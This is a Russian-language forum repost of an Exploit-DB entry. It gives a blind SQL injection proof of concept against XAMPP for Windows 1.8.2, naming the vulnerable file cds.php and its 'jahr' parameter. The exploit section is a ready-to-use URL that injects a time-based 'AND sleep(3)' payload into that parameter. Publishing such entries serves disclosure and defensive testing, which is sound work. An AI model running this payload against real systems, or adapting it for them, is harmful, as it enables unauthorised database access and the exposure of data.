- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29292
- Проверка EDB
-
- Пройдено
- Автор
- SEBASTIáN MAGOF
- Тип уязвимости
- WEBAPPS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2013-10-29
XAMPP for Windows 1.8.2 - Blind SQL Injection
Код:
# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection
# Date: 2013/10/28
# Exploit Author: Sebastián Magof
# Vendor Homepage: apachefriends.org
# Software Link: apachefriends.org/en/xampp-windows.html
# Version:1.8.2/1.7.7
# Tested on: Windows
# Twitter: @smagof
#Greetz: Family, Friends && Under guys;
#Special Greetz: My Alpha (:
#Description:XAMPP is a platform-independent server, free software, which
mainly consists of the MySQL database, the Apache web server and
interpreters for scripting languages: PHP and Perl. The name comes from
the acronym for X, Apache, MySQL, PHP, Perl.
#Sql-Injection: An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your database
and/or expose sensitive information.
#Vulnerable file: cds.php
#Parameter: "jahr="
#Exploit:
http://127.0.0.1/xampp/cds.php?jahr=1967 AND
sleep(3)&interpret=1&titel=555-666-0606
# (\/)
# (**)
#(")(")- Источник
- www.exploit-db.com
